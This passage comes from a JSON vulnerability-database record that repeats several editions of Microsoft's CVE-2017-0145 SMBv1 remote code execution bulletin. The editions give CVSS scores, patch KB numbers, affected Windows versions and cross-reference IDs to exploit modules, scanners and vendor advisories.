"2021-09-12T20:49:50", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T22:47:20", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:20", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T00:46:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012214", "KB4012212", "KB3210720", "KB4013198", "KB3212646", "KB3177186", "KB4012216", "KB3205401", "KB4014077", "KB4013429", "KB4012213", "KB3205409", "KB4012598", "KB4012606", "KB4012217", "KB3213986", "KB4012215", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:29", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T04:50:53", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": 